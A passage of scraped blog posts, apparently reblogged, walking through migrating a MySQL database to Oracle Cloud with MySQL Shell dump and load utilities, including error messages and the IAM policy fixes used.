a user with SET_USER_ID or SUPER privileges Compatibility issues with MySQL Database Service 8.0.21 were found. Please use the 'compatibility' option to apply compatibility adaptations to the dumped DDL. Util.dumpSchemas: Compatibility issues were found (RuntimeError)  MySQL  localhost:33060+ ssl  JS >   FIX:- No action from you , just use  “"compatibility": ["strip_definers", "strip_restricted_grants"]}” option Step#01  CODE to Export from On-P to Object Storage MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["CustomerDB"],"CustomerDBdump",{threads:30,"osBucketName": "chandanBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Output Step#02  CODE to Import from  Object Storage to MySQL Database Service For import into a MySQL DB Service (MDS), the MySQL Shell instance where you run the dump loading utility must be installed on an Oracle Cloud Infrastructure Compute instance that has access to the MySQL DB System. Let’s connect Oracle Cloud Compute Instance ,a nd check whether MDS Instance you are able to connect or not ? How to connect Compute Instance- open Putty and Public IP into it , see below screen shot. How to Deploy MDS Instance ? Below is my another blog which will help us to get through. https://mysqlsolutionsarchitect.blogspot.com/2020/09/how-to-launch-mysql-database-service.html Let’s Connect MDS instance , sudo su root mysqlsh -h10.0.0.13 -uadmin -pXXXXXX DRY RUN scripts:- MySQL  localhost:33060+ ssl  JS > util.loadDump("CustomerDBdump",{dryRun: true, osBucketName: "chandanBucket", osNamespace: "idazzjlcjqzj","ociConfigFile":"/root/.oci/config"}) Suppose I wanted to push to MDS instance , so for that you needed to connect first with MySQL Shell, then execute LoadDump commands, make sure OCI CLI is installed over here. Code to Import into MDS util.loadDump("CustomerDBDump", {threads: 60, osBucketName: "chandanBucket", osNamespace: "idazzjlcjqzj","ociConfigFile":"/root/.oci/config" }) Finally Import Has been done successfully. Let’s Verify The results:-  Connect to MDS and check whether customerDB database has been migrated or not? On-Premises Database:- List of Errors and fixes during whole migration Exercise. Error#01:- Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Cannot open file: /root/.oci/config.   Fix:- Install OCI CLI in your local machine Installing the CLI (document available on D:ChandanCloudOCI_Notes) https://docs.cloud.oracle.com/en-us/iaas/Content/API/SDKDocs/cliinstall.htm     Error:#02- MySQL  localhost:33060+ ssl  JS util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {"osBucketName": "chandanBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Util.dumpSchemas: Failed to get object list using prefix 'CustomerDBdump/': Either the bucket named 'chandanBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) (RuntimeError)  MySQL  localhost:33060+ ssl  JS >  Fix:- look for connectivity from OnP to Oracle cloud object storage, below links will be helpfulhttps://docs.cloud.oracle.com/en-us/iaas/Content/API/SDKDocs/cliinstall.htm #oci os ns get Error#03 MySQL  localhost:33060+ ssl  Py util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {"osBucketName": "chandanBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Failed to list multipart uploads: Either the bucket named 'chandanBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) Fix:- make sure you have set policies Allow group chandangroup to read buckets in compartment chandankumar-sandbox Allow group chandangroup to manage objects in compartment chandankumar-sandbox where any {request.permission='OBJECT_CREATE', request.permission='OBJECT_INSPECT'} Allow group chandangroup to read objects in compartment chandankumar-sandbox Error#04   MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {"osBucketName": "chandanBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Checking for compatibility with MySQL Database Service 8.0.21 NOTE: Database sales had unsupported ENCRYPTION option commented out Compatibility issues with MySQL Database Service 8.0.21 were found and repaired. Please review the changes made before loading them. Acquiring global read lock All transactions have been started Locking instance for backup Global read lock has been released Writing global DDL files Preparing data dump for table `sales`.`employee` Writing DDL for schema `sales` Writing DDL for table `sales`.`employee` WARNING: Could not select a column to be used as an index for table `sales`.`employee`. Chunking has been disabled for this table, data will be dumped to a single file. Running data dump using 4 threads. NOTE: Progress information uses estimated values and may not be accurate. Data dump for table `sales`.`employee` will be written to 1 file ERROR: [Worker001]: Failed to rename object 'worlddump/[email protected]' to 'worlddump/[email protected]': Either the bucket named 'BootcampBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) Util.dumpSchemas: Fatal error during dump (RuntimeError) FixMake sure you have given Rename Permission/policies to objects  Allow group chandangroup to manage objects in compartment chandankumar-sandbox where any {request.permission='OBJECT_CREATE', request.permission='OBJECT_INSPECT', request.permission='OBJECT_OVERWRITE',request.permission='OBJECT_DELETE'} Final Policies:-  Error#06 Fix:- Re-login with root user:- sudo su root mysqlsh -h10.0.0.13 -uadmin -p   Conclusion:- Migration happened successfully!!! MySQL Database Service is a fully managed database service that enables organizations to deploy cloud-native applications using the world's most popular open source database. It is 100% developed, managed and supported by the MySQL Team. MySQL Shell 8.0.21 makes MySQL easier to use, by providing an interactive MySQL client supporting SQL, Document Store, JavaScript & Python interface with support for writing custom extensions. https://mysqlsolutionsarchitect.blogspot.com/2020/09/how-to-migrate-on-premises-mysql.html
0 notes
globalmediacampaign · 5 years ago
Text
How to Migrate On-premises MySQL Enterprise Database to OCI Compute Instance MySQL Enterprise Database ?
Migrating On-premises MySQL Enterprise Database to OCI Compute Instance MySQL Enterprise Database ? In this post , we will walk through steps needed to migrate particular database(example - Sales database) from local Instance(On-premises) to Oracle Cloud Infrastructure Compute Instance. We will use two new features introduced with latest release of MySQL 8.0.21. 1.       Dump Schema Utility a.       This will help us to take the backup from On-promises database and export  to Oracle Cloud Object Storage. 2.       Load Dump Utility a.       This is help us to Import the schema from Object Storage to local compute Instance. More info:- https://dev.mysql.com/doc/mysql-shell/8.0/en/mysql-shell-utilities-dump-instance-schema.html  How does Migration Work ? Suppose you wanted to do lift-shift of database called “sales” , so “Schema Dump” utility will export sales database from on-premises to OCI(oracle cloud infrastructure) object storage. Then “Load Dump” utility will import directly to MySQL Instance running in OCI compute instance. Below diagram I have made for clear understanding… What do we needed handy 1.       MySQL Shell 8.0.21 Version. 2.       On-premises MySQL Up and Running. 3.       Cloud Instances Up and Running. 4.       Install OCI CLI on On-premises Machine. 5.       Install OCI CLI on OCI(Oracle Cloud Compute Instance) 6.       local_infile variables must be ON  for destination machine. Additional Details On-Premises Instance Details Oracle Cloud Compute Instance Details Database Name:- Sales IP:- 192.168.1.10 User:- root Port: 3306 Public IP Address: 140.238.227.33 MySQL Username:- admin MySQL Port: 3306 MySQL Host: 127.0.0.1  Command to Export the backup from On-premises to OCI Object Storage MySQL  localhost:33060+ ssl  Py >  util.dump_schemas(["sales"], "worlddump", {"osBucketName": "BootcampBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Checking for compatibility with MySQL Database Service 8.0.21 NOTE: Database sales had unsupported ENCRYPTION option commented out Compatibility issues with MySQL Database Service 8.0.21 were found and repaired. Please review the changes made before loading them. Acquiring global read lock All transactions have been started Locking instance for backup Global read lock has been released Writing global DDL files Preparing data dump for table `sales`.`employee` Writing DDL for schema `sales` Writing DDL for table `sales`.`employee` Data dump for table `sales`.`employee` will be chunked using column `empid` Running data dump using 4 threads. NOTE: Progress information uses estimated values and may not be accurate. Data dump for table `sales`.`employee` will be written to 1 file 1 thds dumping - 100% (2 rows / ~2 rows), 0.00 rows/s, 12.00 B/s uncompressed, 0.00 B/s compressed Duration: 00:00:03s Schemas dumped: 1 Tables dumped: 1 Uncompressed data size: 39 bytes Compressed data size: 0 bytes Compression ratio: 39.0 Rows written: 2 Bytes written: 0 bytes Average uncompressed throughput: 10.61 B/s Average compressed throughput: 0.00 B/s  MySQL  localhost:33060+ ssl  Py >   Import Dump file into Compute Instance from OCI Object Storage util.loadDump("worlddump", {threads: 8, osBucketName: "BootcampBucket", osNamespace: "idazzjlcjqzj","ociConfigFile":"/root/.oci/config" }) Verify The results On-Premises Database:- Conclusion:- Migration happened successfully!!! MySQL Shell 8.0.21 makes MySQL easier to use, by providing an interactive MySQL client supporting SQL, Document Store, JavaScript & Python interface with support for writing custom extensions. And with dumpInstance(), dumpSchemas(), importTable() and loadDump()  MySQL Shell now provides powerful logical dump and load functionality. ===========Rough Notes========================================= So doing this Migration what are challenges has come? what are Error has occurred and most important how did you fix it up? Let's have a look for all Error one by one... Error#01:- Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Cannot open file: /root/.oci/config.  Fix:-  Install OCI CLI in your local machine Installing the CLI (document available on D:ChandanCloudOCI_Notes) https://docs.cloud.oracle.com/en-us/iaas/Content/API/SDKDocs/cliinstall.htm   Error:#02- MySQL  localhost:33060+ ssl  Py > util.dump_schemas(["sales"], "salesdump", {"osBucketName": "BootcampBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Failed to get object list using prefix 'salesdump/': The required information to complete authentication was not provided. (401) Fix:-  util.dump_schemas(["sales"], "worlddump", {"osBucketName": "dumpbucket-2", "osNamespace": "idazzjlcjqzj",  "ocimds": "true", "compatibility": ["strip_definers", "strip_restricted_grants"]})  Note:- don’t change the name of worlddump. Error#03 MySQL  localhost:33060+ ssl  Py > util.dump_schemas(["sales"], "worlddump", {"osBucketName": "BootcampBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Traceback (most recent call last):   File "", line 1, in SystemError: RuntimeError: Util.dump_schemas: Failed to list multipart uploads: Either the bucket named 'BootcampBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) Fix:- make sure you have set policies Allow group chandangroup to read buckets in compartment chandankumar-sandbox Allow group chandangroup to manage objects in compartment chandankumar-sandbox where any {request.permission='OBJECT_CREATE', request.permission='OBJECT_INSPECT'} Allow group chandangroup to read objects in compartment chandankumar-sandbox   Error#04    MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["sales"], "worlddump", {"osBucketName": "BootcampBucket", "osNamespace": "idazzjlcjqzj",  "ocimds": "true","ociConfigFile":"/root/.oci/config", "compatibility": ["strip_definers", "strip_restricted_grants"]}) Checking for compatibility with MySQL Database Service 8.0.21 NOTE: Database sales had unsupported ENCRYPTION option commented out Compatibility issues with MySQL Database Service 8.0.21 were found and repaired. Please review the changes made before loading them. Acquiring global read lock All transactions have been started Locking instance for backup Global read lock has been released Writing global DDL files Preparing data dump for table `sales`.`employee` Writing DDL for schema `sales` Writing DDL for table `sales`.`employee` WARNING: Could not select a column to be used as an index for table `sales`.`employee`. Chunking has been disabled for this table, data will be dumped to a single file. Running data dump using 4 threads. NOTE: Progress information uses estimated values and may not be accurate. Data dump for table `sales`.`employee` will be written to 1 file ERROR: [Worker001]: Failed to rename object 'worlddump/[email protected]' to 'worlddump/[email protected]': Either the bucket named 'BootcampBucket' does not exist in the namespace 'idazzjlcjqzj' or you are not authorized to access it (404) Util.dumpSchemas: Fatal error during dump (RuntimeError) Fix Make sure you have given Rename Permission/policies to objects   Allow group chandangroup to manage objects in compartment chandankumar-sandbox where any {request.permission='OBJECT_CREATE', request.permission='OBJECT_INSPECT', request.permission='OBJECT_OVERWRITE',request.permission='OBJECT_DELETE'} Final Policies:- go to OCI console --> Identity-->Policies--> add Policy Thank you for using MySQL!!! Please test and let us know your feedback... Share your feedback on improvement on my blog ,thank you! https://mysqlsolutionsarchitect.blogspot.com/2020/08/how-to-migrate-on-premises-mysql.html
0 notes